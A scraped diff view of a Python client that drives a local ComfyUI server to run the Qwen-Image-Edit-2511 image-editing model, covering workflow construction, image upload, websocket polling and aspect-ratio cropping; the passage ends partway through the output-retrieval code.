|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
ComfyUI Client for Qwen-Image-Edit-2511
|
| 3 |
+
========================================
|
| 4 |
+
|
| 5 |
+
Client to interact with ComfyUI API for running Qwen-Image-Edit-2511.
|
| 6 |
+
|
| 7 |
+
Model setup (download from HuggingFace):
|
| 8 |
+
|
| 9 |
+
Lightning (default, 4-step):
|
| 10 |
+
diffusion_models/ qwen_image_edit_2511_fp8_e4m3fn_scaled_lightning_comfyui_4steps_v1.0.safetensors
|
| 11 |
+
(lightx2v/Qwen-Image-Edit-2511-Lightning)
|
| 12 |
+
|
| 13 |
+
Standard (20-step, optional):
|
| 14 |
+
diffusion_models/ qwen_image_edit_2511_fp8mixed.safetensors
|
| 15 |
+
(Comfy-Org/Qwen-Image-Edit_ComfyUI)
|
| 16 |
+
|
| 17 |
+
Shared:
|
| 18 |
+
text_encoders/ qwen_2.5_vl_7b_fp8_scaled.safetensors (Comfy-Org/Qwen-Image_ComfyUI)
|
| 19 |
+
vae/ qwen_image_vae.safetensors (Comfy-Org/Qwen-Image_ComfyUI)
|
| 20 |
+
|
| 21 |
+
Required custom nodes:
|
| 22 |
+
- Comfyui-QwenEditUtils (lrzjason) for TextEncodeQwenImageEditPlus
|
| 23 |
+
"""
|
| 24 |
+
|
| 25 |
+
import logging
|
| 26 |
+
import time
|
| 27 |
+
import uuid
|
| 28 |
+
import json
|
| 29 |
+
import io
|
| 30 |
+
import base64
|
| 31 |
+
from typing import Optional, List, Tuple
|
| 32 |
+
from PIL import Image
|
| 33 |
+
import websocket
|
| 34 |
+
import urllib.request
|
| 35 |
+
import urllib.parse
|
| 36 |
+
|
| 37 |
+
from .models import GenerationRequest, GenerationResult
|
| 38 |
+
|
| 39 |
+
|
| 40 |
+
logger = logging.getLogger(__name__)
|
| 41 |
+
|
| 42 |
+
|
| 43 |
+
class ComfyUIClient:
|
| 44 |
+
"""
|
| 45 |
+
Client for ComfyUI API to run Qwen-Image-Edit-2511.
|
| 46 |
+
|
| 47 |
+
Requires ComfyUI running with:
|
| 48 |
+
- Qwen-Image-Edit-2511 model in models/diffusion_models/
|
| 49 |
+
- Qwen 2.5 VL 7B text encoder in models/text_encoders/
|
| 50 |
+
- Qwen Image VAE in models/vae/
|
| 51 |
+
- Comfyui-QwenEditUtils custom node installed
|
| 52 |
+
"""
|
| 53 |
+
|
| 54 |
+
# Default ComfyUI settings
|
| 55 |
+
DEFAULT_HOST = "127.0.0.1"
|
| 56 |
+
DEFAULT_PORT = 8188
|
| 57 |
+
|
| 58 |
+
# Model file names (expected in ComfyUI models/ subfolders)
|
| 59 |
+
# Lightning: baked model (LoRA pre-merged, ComfyUI-specific format)
|
| 60 |
+
UNET_MODEL_LIGHTNING = "qwen_image_edit_2511_fp8_e4m3fn_scaled_lightning_comfyui_4steps_v1.0.safetensors"
|
| 61 |
+
# Standard: base fp8mixed model (20-step, higher quality)
|
| 62 |
+
UNET_MODEL_STANDARD = "qwen_image_edit_2511_fp8mixed.safetensors"
|
| 63 |
+
TEXT_ENCODER = "qwen_2.5_vl_7b_fp8_scaled.safetensors"
|
| 64 |
+
VAE_MODEL = "qwen_image_vae.safetensors"
|
| 65 |
+
|
| 66 |
+
# Target output dimensions per aspect ratio.
|
| 67 |
+
# Generation happens at 1024x1024, then crop+resize to these.
|
| 68 |
+
ASPECT_RATIOS = {
|
| 69 |
+
"1:1": (1024, 1024),
|
| 70 |
+
"16:9": (1344, 768),
|
| 71 |
+
"9:16": (768, 1344),
|
| 72 |
+
"21:9": (1680, 720),
|
| 73 |
+
"3:2": (1248, 832),
|
| 74 |
+
"2:3": (832, 1248),
|
| 75 |
+
"3:4": (896, 1152),
|
| 76 |
+
"4:3": (1152, 896),
|
| 77 |
+
"4:5": (1024, 1280),
|
| 78 |
+
"5:4": (1280, 1024),
|
| 79 |
+
}
|
| 80 |
+
|
| 81 |
+
# Generate at 1024x1024 (proven safe for Qwen's VAE), then crop+resize
|
| 82 |
+
NATIVE_RESOLUTION = (1024, 1024)
|
| 83 |
+
|
| 84 |
+
# With Lightning LoRA: 4 steps, CFG 1.0 (fast, ~seconds per view)
|
| 85 |
+
# Without LoRA: 20 steps, CFG 4.0
|
| 86 |
+
DEFAULT_STEPS_LIGHTNING = 4
|
| 87 |
+
DEFAULT_STEPS_STANDARD = 20
|
| 88 |
+
DEFAULT_CFG_LIGHTNING = 1.0
|
| 89 |
+
DEFAULT_CFG_STANDARD = 4.0
|
| 90 |
+
|
| 91 |
+
def __init__(
|
| 92 |
+
self,
|
| 93 |
+
host: str = DEFAULT_HOST,
|
| 94 |
+
port: int = DEFAULT_PORT,
|
| 95 |
+
use_lightning: bool = True,
|
| 96 |
+
):
|
| 97 |
+
"""
|
| 98 |
+
Initialize ComfyUI client.
|
| 99 |
+
|
| 100 |
+
Args:
|
| 101 |
+
host: ComfyUI server host
|
| 102 |
+
port: ComfyUI server port
|
| 103 |
+
use_lightning: Use Lightning LoRA for 4-step generation (much faster)
|
| 104 |
+
"""
|
| 105 |
+
self.host = host
|
| 106 |
+
self.port = port
|
| 107 |
+
self.use_lightning = use_lightning
|
| 108 |
+
self.client_id = str(uuid.uuid4())
|
| 109 |
+
self.server_address = f"{host}:{port}"
|
| 110 |
+
|
| 111 |
+
if use_lightning:
|
| 112 |
+
self.num_inference_steps = self.DEFAULT_STEPS_LIGHTNING
|
| 113 |
+
self.cfg_scale = self.DEFAULT_CFG_LIGHTNING
|
| 114 |
+
else:
|
| 115 |
+
self.num_inference_steps = self.DEFAULT_STEPS_STANDARD
|
| 116 |
+
self.cfg_scale = self.DEFAULT_CFG_STANDARD
|
| 117 |
+
|
| 118 |
+
logger.info(
|
| 119 |
+
f"ComfyUIClient initialized for {self.server_address} "
|
| 120 |
+
f"(lightning={use_lightning}, steps={self.num_inference_steps})"
|
| 121 |
+
)
|
| 122 |
+
|
| 123 |
+
def is_healthy(self) -> bool:
|
| 124 |
+
"""Check if ComfyUI server is running and accessible."""
|
| 125 |
+
try:
|
| 126 |
+
url = f"http://{self.server_address}/system_stats"
|
| 127 |
+
with urllib.request.urlopen(url, timeout=5) as response:
|
| 128 |
+
return response.status == 200
|
| 129 |
+
except Exception:
|
| 130 |
+
return False
|
| 131 |
+
|
| 132 |
+
def _upload_image(self, image: Image.Image, name: str = "input.png") -> Optional[str]:
|
| 133 |
+
"""
|
| 134 |
+
Upload an image to ComfyUI, pre-resized to fit within 1024x1024.
|
| 135 |
+
|
| 136 |
+
Args:
|
| 137 |
+
image: PIL Image to upload
|
| 138 |
+
name: Filename for the uploaded image
|
| 139 |
+
|
| 140 |
+
Returns:
|
| 141 |
+
Filename on server, or None if failed
|
| 142 |
+
"""
|
| 143 |
+
try:
|
| 144 |
+
# Pre-resize to keep total pixels around 1024x1024 (matching reference workflow)
|
| 145 |
+
max_pixels = 1024 * 1024
|
| 146 |
+
w, h = image.size
|
| 147 |
+
if w * h > max_pixels:
|
| 148 |
+
scale = (max_pixels / (w * h)) ** 0.5
|
| 149 |
+
new_w = int(w * scale)
|
| 150 |
+
new_h = int(h * scale)
|
| 151 |
+
image = image.resize((new_w, new_h), Image.LANCZOS)
|
| 152 |
+
logger.debug(f"Pre-resized input from {w}x{h} to {new_w}x{new_h}")
|
| 153 |
+
|
| 154 |
+
# Convert image to bytes
|
| 155 |
+
img_bytes = io.BytesIO()
|
| 156 |
+
image.save(img_bytes, format='PNG')
|
| 157 |
+
img_bytes.seek(0)
|
| 158 |
+
|
| 159 |
+
# Create multipart form data
|
| 160 |
+
boundary = uuid.uuid4().hex
|
| 161 |
+
|
| 162 |
+
body = b''
|
| 163 |
+
body += f'--{boundary}\r\n'.encode()
|
| 164 |
+
body += f'Content-Disposition: form-data; name="image"; filename="{name}"\r\n'.encode()
|
| 165 |
+
body += b'Content-Type: image/png\r\n\r\n'
|
| 166 |
+
body += img_bytes.read()
|
| 167 |
+
body += f'\r\n--{boundary}--\r\n'.encode()
|
| 168 |
+
|
| 169 |
+
url = f"http://{self.server_address}/upload/image"
|
| 170 |
+
req = urllib.request.Request(
|
| 171 |
+
url,
|
| 172 |
+
data=body,
|
| 173 |
+
headers={
|
| 174 |
+
'Content-Type': f'multipart/form-data; boundary={boundary}'
|
| 175 |
+
}
|
| 176 |
+
)
|
| 177 |
+
|
| 178 |
+
with urllib.request.urlopen(req) as response:
|
| 179 |
+
result = json.loads(response.read())
|
| 180 |
+
return result.get('name')
|
| 181 |
+
|
| 182 |
+
except Exception as e:
|
| 183 |
+
logger.error(f"Failed to upload image: {e}")
|
| 184 |
+
return None
|
| 185 |
+
|
| 186 |
+
def _queue_prompt(self, prompt: dict) -> str:
|
| 187 |
+
"""
|
| 188 |
+
Queue a prompt for execution.
|
| 189 |
+
|
| 190 |
+
Args:
|
| 191 |
+
prompt: Workflow prompt dict
|
| 192 |
+
|
| 193 |
+
Returns:
|
| 194 |
+
Prompt ID
|
| 195 |
+
"""
|
| 196 |
+
prompt_id = str(uuid.uuid4())
|
| 197 |
+
p = {"prompt": prompt, "client_id": self.client_id, "prompt_id": prompt_id}
|
| 198 |
+
data = json.dumps(p).encode('utf-8')
|
| 199 |
+
|
| 200 |
+
url = f"http://{self.server_address}/prompt"
|
| 201 |
+
req = urllib.request.Request(url, data=data)
|
| 202 |
+
urllib.request.urlopen(req)
|
| 203 |
+
|
| 204 |
+
return prompt_id
|
| 205 |
+
|
| 206 |
+
def _get_history(self, prompt_id: str) -> dict:
|
| 207 |
+
"""Get execution history for a prompt."""
|
| 208 |
+
url = f"http://{self.server_address}/history/{prompt_id}"
|
| 209 |
+
with urllib.request.urlopen(url) as response:
|
| 210 |
+
return json.loads(response.read())
|
| 211 |
+
|
| 212 |
+
def _get_image(self, filename: str, subfolder: str, folder_type: str) -> bytes:
|
| 213 |
+
"""Get an image from ComfyUI."""
|
| 214 |
+
data = {"filename": filename, "subfolder": subfolder, "type": folder_type}
|
| 215 |
+
url_values = urllib.parse.urlencode(data)
|
| 216 |
+
url = f"http://{self.server_address}/view?{url_values}"
|
| 217 |
+
with urllib.request.urlopen(url) as response:
|
| 218 |
+
return response.read()
|
| 219 |
+
|
| 220 |
+
def _wait_for_completion(self, prompt_id: str, timeout: float = 900.0) -> bool:
|
| 221 |
+
"""
|
| 222 |
+
Wait for prompt execution to complete using websocket.
|
| 223 |
+
|
| 224 |
+
Args:
|
| 225 |
+
prompt_id: The prompt ID to wait for
|
| 226 |
+
timeout: Maximum time to wait in seconds (default 15 min for image editing)
|
| 227 |
+
|
| 228 |
+
Returns:
|
| 229 |
+
True if completed successfully, False if timeout/error
|
| 230 |
+
"""
|
| 231 |
+
ws = None
|
| 232 |
+
try:
|
| 233 |
+
ws_url = f"ws://{self.server_address}/ws?clientId={self.client_id}"
|
| 234 |
+
ws = websocket.WebSocket()
|
| 235 |
+
ws.settimeout(timeout)
|
| 236 |
+
ws.connect(ws_url)
|
| 237 |
+
|
| 238 |
+
start_time = time.time()
|
| 239 |
+
while time.time() - start_time < timeout:
|
| 240 |
+
try:
|
| 241 |
+
out = ws.recv()
|
| 242 |
+
if isinstance(out, str):
|
| 243 |
+
message = json.loads(out)
|
| 244 |
+
if message['type'] == 'executing':
|
| 245 |
+
data = message['data']
|
| 246 |
+
if data['node'] is None and data['prompt_id'] == prompt_id:
|
| 247 |
+
return True # Execution complete
|
| 248 |
+
elif message['type'] == 'execution_error':
|
| 249 |
+
logger.error(f"Execution error: {message}")
|
| 250 |
+
return False
|
| 251 |
+
except websocket.WebSocketTimeoutException:
|
| 252 |
+
continue
|
| 253 |
+
|
| 254 |
+
logger.error("Timeout waiting for completion")
|
| 255 |
+
return False
|
| 256 |
+
|
| 257 |
+
except Exception as e:
|
| 258 |
+
logger.error(f"WebSocket error: {e}")
|
| 259 |
+
return False
|
| 260 |
+
finally:
|
| 261 |
+
if ws:
|
| 262 |
+
try:
|
| 263 |
+
ws.close()
|
| 264 |
+
except:
|
| 265 |
+
pass
|
| 266 |
+
|
| 267 |
+
def _get_dimensions(self, aspect_ratio: str) -> Tuple[int, int]:
|
| 268 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 269 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 270 |
+
return self.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
| 271 |
+
|
| 272 |
+
@staticmethod
|
| 273 |
+
def _crop_and_resize(image: Image.Image, target_w: int, target_h: int) -> Image.Image:
|
| 274 |
+
"""Crop to target aspect ratio, then resize. Centers the crop."""
|
| 275 |
+
src_w, src_h = image.size
|
| 276 |
+
target_ratio = target_w / target_h
|
| 277 |
+
src_ratio = src_w / src_h
|
| 278 |
+
|
| 279 |
+
if abs(target_ratio - src_ratio) < 0.01:
|
| 280 |
+
return image.resize((target_w, target_h), Image.LANCZOS)
|
| 281 |
+
|
| 282 |
+
if target_ratio < src_ratio:
|
| 283 |
+
crop_w = int(src_h * target_ratio)
|
| 284 |
+
offset = (src_w - crop_w) // 2
|
| 285 |
+
image = image.crop((offset, 0, offset + crop_w, src_h))
|
| 286 |
+
else:
|
| 287 |
+
crop_h = int(src_w / target_ratio)
|
| 288 |
+
offset = (src_h - crop_h) // 2
|
| 289 |
+
image = image.crop((0, offset, src_w, offset + crop_h))
|
| 290 |
+
|
| 291 |
+
return image.resize((target_w, target_h), Image.LANCZOS)
|
| 292 |
+
|
| 293 |
+
def _build_workflow(
|
| 294 |
+
self,
|
| 295 |
+
prompt: str,
|
| 296 |
+
width: int,
|
| 297 |
+
height: int,
|
| 298 |
+
input_images: List[str] = None,
|
| 299 |
+
negative_prompt: str = ""
|
| 300 |
+
) -> dict:
|
| 301 |
+
"""
|
| 302 |
+
Build the ComfyUI workflow for Qwen-Image-Edit-2511.
|
| 303 |
+
|
| 304 |
+
Workflow graph:
|
| 305 |
+
UNETLoader → KSampler
|
| 306 |
+
CLIPLoader → TextEncodeQwenImageEditPlus (pos/neg)
|
| 307 |
+
VAELoader → TextEncode + VAEDecode
|
| 308 |
+
LoadImage(s) → TextEncodeQwenImageEditPlus
|
| 309 |
+
EmptyQwenImageLayeredLatentImage → KSampler
|
| 310 |
+
KSampler → VAEDecode → PreviewImage
|
| 311 |
+
|
| 312 |
+
Lightning mode uses a baked model (LoRA pre-merged), no separate
|
| 313 |
+
LoRA or ModelSamplingAuraFlow nodes needed.
|
| 314 |
+
"""
|
| 315 |
+
workflow = {}
|
| 316 |
+
node_id = 1
|
| 317 |
+
|
| 318 |
+
# --- Model loading ---
|
| 319 |
+
|
| 320 |
+
# Select model based on lightning mode
|
| 321 |
+
unet_name = (self.UNET_MODEL_LIGHTNING if self.use_lightning
|
| 322 |
+
else self.UNET_MODEL_STANDARD)
|
| 323 |
+
|
| 324 |
+
# UNETLoader - weight_dtype "default" lets ComfyUI auto-detect fp8
|
| 325 |
+
unet_id = str(node_id)
|
| 326 |
+
workflow[unet_id] = {
|
| 327 |
+
"class_type": "UNETLoader",
|
| 328 |
+
"inputs": {
|
| 329 |
+
"unet_name": unet_name,
|
| 330 |
+
"weight_dtype": "default"
|
| 331 |
+
}
|
| 332 |
+
}
|
| 333 |
+
node_id += 1
|
| 334 |
+
|
| 335 |
+
# CLIPLoader
|
| 336 |
+
clip_id = str(node_id)
|
| 337 |
+
workflow[clip_id] = {
|
| 338 |
+
"class_type": "CLIPLoader",
|
| 339 |
+
"inputs": {
|
| 340 |
+
"clip_name": self.TEXT_ENCODER,
|
| 341 |
+
"type": "qwen_image"
|
| 342 |
+
}
|
| 343 |
+
}
|
| 344 |
+
node_id += 1
|
| 345 |
+
|
| 346 |
+
# VAELoader
|
| 347 |
+
vae_id = str(node_id)
|
| 348 |
+
workflow[vae_id] = {
|
| 349 |
+
"class_type": "VAELoader",
|
| 350 |
+
"inputs": {
|
| 351 |
+
"vae_name": self.VAE_MODEL
|
| 352 |
+
}
|
| 353 |
+
}
|
| 354 |
+
node_id += 1
|
| 355 |
+
|
| 356 |
+
model_out_id = unet_id
|
| 357 |
+
|
| 358 |
+
# --- Input images ---
|
| 359 |
+
|
| 360 |
+
image_loader_ids = []
|
| 361 |
+
if input_images:
|
| 362 |
+
for img_name in input_images[:3]: # Max 3 reference images
|
| 363 |
+
img_loader_id = str(node_id)
|
| 364 |
+
workflow[img_loader_id] = {
|
| 365 |
+
"class_type": "LoadImage",
|
| 366 |
+
"inputs": {
|
| 367 |
+
"image": img_name
|
| 368 |
+
}
|
| 369 |
+
}
|
| 370 |
+
image_loader_ids.append(img_loader_id)
|
| 371 |
+
node_id += 1
|
| 372 |
+
|
| 373 |
+
# --- Text encoding ---
|
| 374 |
+
|
| 375 |
+
# Positive: prompt + vision references + VAE
|
| 376 |
+
pos_encode_id = str(node_id)
|
| 377 |
+
pos_inputs = {
|
| 378 |
+
"clip": [clip_id, 0],
|
| 379 |
+
"prompt": prompt,
|
| 380 |
+
"vae": [vae_id, 0]
|
| 381 |
+
}
|
| 382 |
+
for i, loader_id in enumerate(image_loader_ids):
|
| 383 |
+
pos_inputs[f"image{i+1}"] = [loader_id, 0]
|
| 384 |
+
|
| 385 |
+
workflow[pos_encode_id] = {
|
| 386 |
+
"class_type": "TextEncodeQwenImageEditPlus",
|
| 387 |
+
"inputs": pos_inputs
|
| 388 |
+
}
|
| 389 |
+
node_id += 1
|
| 390 |
+
|
| 391 |
+
# Negative: text only, no images
|
| 392 |
+
neg_encode_id = str(node_id)
|
| 393 |
+
workflow[neg_encode_id] = {
|
| 394 |
+
"class_type": "TextEncodeQwenImageEditPlus",
|
| 395 |
+
"inputs": {
|
| 396 |
+
"clip": [clip_id, 0],
|
| 397 |
+
"prompt": negative_prompt or " ",
|
| 398 |
+
"vae": [vae_id, 0]
|
| 399 |
+
}
|
| 400 |
+
}
|
| 401 |
+
node_id += 1
|
| 402 |
+
|
| 403 |
+
# --- Latent + sampling ---
|
| 404 |
+
|
| 405 |
+
latent_id = str(node_id)
|
| 406 |
+
workflow[latent_id] = {
|
| 407 |
+
"class_type": "EmptySD3LatentImage",
|
| 408 |
+
"inputs": {
|
| 409 |
+
"width": width,
|
| 410 |
+
"height": height,
|
| 411 |
+
"batch_size": 1
|
| 412 |
+
}
|
| 413 |
+
}
|
| 414 |
+
node_id += 1
|
| 415 |
+
|
| 416 |
+
sampler_id = str(node_id)
|
| 417 |
+
workflow[sampler_id] = {
|
| 418 |
+
"class_type": "KSampler",
|
| 419 |
+
"inputs": {
|
| 420 |
+
"model": [model_out_id, 0],
|
| 421 |
+
"positive": [pos_encode_id, 0],
|
| 422 |
+
"negative": [neg_encode_id, 0],
|
| 423 |
+
"latent_image": [latent_id, 0],
|
| 424 |
+
"seed": int(time.time()) % 2**32,
|
| 425 |
+
"steps": self.num_inference_steps,
|
| 426 |
+
"cfg": self.cfg_scale,
|
| 427 |
+
"sampler_name": "euler",
|
| 428 |
+
"scheduler": "simple",
|
| 429 |
+
"denoise": 1.0
|
| 430 |
+
}
|
| 431 |
+
}
|
| 432 |
+
node_id += 1
|
| 433 |
+
|
| 434 |
+
# --- Decode + output ---
|
| 435 |
+
|
| 436 |
+
decode_id = str(node_id)
|
| 437 |
+
workflow[decode_id] = {
|
| 438 |
+
"class_type": "VAEDecode",
|
| 439 |
+
"inputs": {
|
| 440 |
+
"samples": [sampler_id, 0],
|
| 441 |
+
"vae": [vae_id, 0]
|
| 442 |
+
}
|
| 443 |
+
}
|
| 444 |
+
node_id += 1
|
| 445 |
+
|
| 446 |
+
preview_id = str(node_id)
|
| 447 |
+
workflow[preview_id] = {
|
| 448 |
+
"class_type": "PreviewImage",
|
| 449 |
+
"inputs": {
|
| 450 |
+
"images": [decode_id, 0]
|
| 451 |
+
}
|
| 452 |
+
}
|
| 453 |
+
|
| 454 |
+
return workflow
|
| 455 |
+
|
| 456 |
+
def generate(
|
| 457 |
+
self,
|
| 458 |
+
request: GenerationRequest,
|
| 459 |
+
num_inference_steps: Optional[int] = None,
|
| 460 |
+
cfg_scale: Optional[float] = None
|
| 461 |
+
) -> GenerationResult:
|
| 462 |
+
"""
|
| 463 |
+
Generate/edit image using Qwen-Image-Edit-2511 via ComfyUI.
|
| 464 |
+
|
| 465 |
+
Generates at native 1024x1024, then crop+resize to requested
|
| 466 |
+
aspect ratio for clean VAE output.
|
| 467 |
+
"""
|
| 468 |
+
if not self.is_healthy():
|
| 469 |
+
return GenerationResult.error_result(
|
| 470 |
+
"ComfyUI server is not accessible. Make sure ComfyUI is running on "
|
| 471 |
+
f"{self.server_address}"
|
| 472 |
+
)
|
| 473 |
+
|
| 474 |
+
try:
|
| 475 |
+
start_time = time.time()
|
| 476 |
+
|
| 477 |
+
# Target dimensions for post-processing
|
| 478 |
+
target_w, target_h = self._get_dimensions(request.aspect_ratio)
|
| 479 |
+
# Generate at native resolution (VAE-safe)
|
| 480 |
+
native_w, native_h = self.NATIVE_RESOLUTION
|
| 481 |
+
|
| 482 |
+
# Upload input images (max 3)
|
| 483 |
+
uploaded_images = []
|
| 484 |
+
if request.has_input_images:
|
| 485 |
+
for i, img in enumerate(request.input_images):
|
| 486 |
+
if img is not None:
|
| 487 |
+
name = f"input_{i}_{uuid.uuid4().hex[:8]}.png"
|
| 488 |
+
uploaded_name = self._upload_image(img, name)
|
| 489 |
+
if uploaded_name:
|
| 490 |
+
uploaded_images.append(uploaded_name)
|
| 491 |
+
else:
|
| 492 |
+
logger.warning(f"Failed to upload image {i}")
|
| 493 |
+
|
| 494 |
+
steps = num_inference_steps or self.num_inference_steps
|
| 495 |
+
cfg = cfg_scale or self.cfg_scale
|
| 496 |
+
|
| 497 |
+
# Temporarily set for workflow build
|
| 498 |
+
old_steps, old_cfg = self.num_inference_steps, self.cfg_scale
|
| 499 |
+
self.num_inference_steps, self.cfg_scale = steps, cfg
|
| 500 |
+
|
| 501 |
+
workflow = self._build_workflow(
|
| 502 |
+
prompt=request.prompt,
|
| 503 |
+
width=native_w,
|
| 504 |
+
height=native_h,
|
| 505 |
+
input_images=uploaded_images or None,
|
| 506 |
+
negative_prompt=request.negative_prompt or ""
|
| 507 |
+
)
|
| 508 |
+
|
| 509 |
+
self.num_inference_steps, self.cfg_scale = old_steps, old_cfg
|
| 510 |
+
|
| 511 |
+
logger.info(f"Generating with ComfyUI/Qwen: {request.prompt[:80]}...")
|
| 512 |
+
logger.info(
|
| 513 |
+
f"Native: {native_w}x{native_h}, target: {target_w}x{target_h}, "
|
| 514 |
+
f"steps: {steps}, cfg: {cfg}, images: {len(uploaded_images)}, "
|
| 515 |
+
f"lightning: {self.use_lightning}"
|
| 516 |
+
)
|
| 517 |
+
|
| 518 |
+
# Queue and wait
|
| 519 |
+
prompt_id = self._queue_prompt(workflow)
|
| 520 |
+
logger.info(f"Queued prompt: {prompt_id}")
|
| 521 |
+
|
| 522 |
+
if not self._wait_for_completion(prompt_id):
|
| 523 |
+
return GenerationResult.error_result("Generation failed or timed out")
|
| 524 |
+
|
| 525 |
+
# Retrieve output
|
| 526 |
+
history = self._get_history(prompt_id)
|
| 527 |
+
if prompt_id not in history:
|
| 528 |
+
return GenerationResult.error_result("No history found for prompt")
|
| 529 |
+
|
| 530 |
+
outputs = history[prompt_id].get('outputs', {})
|
| 531 |
+
for nid, node_output in outputs.items():
|
| 532 |
+
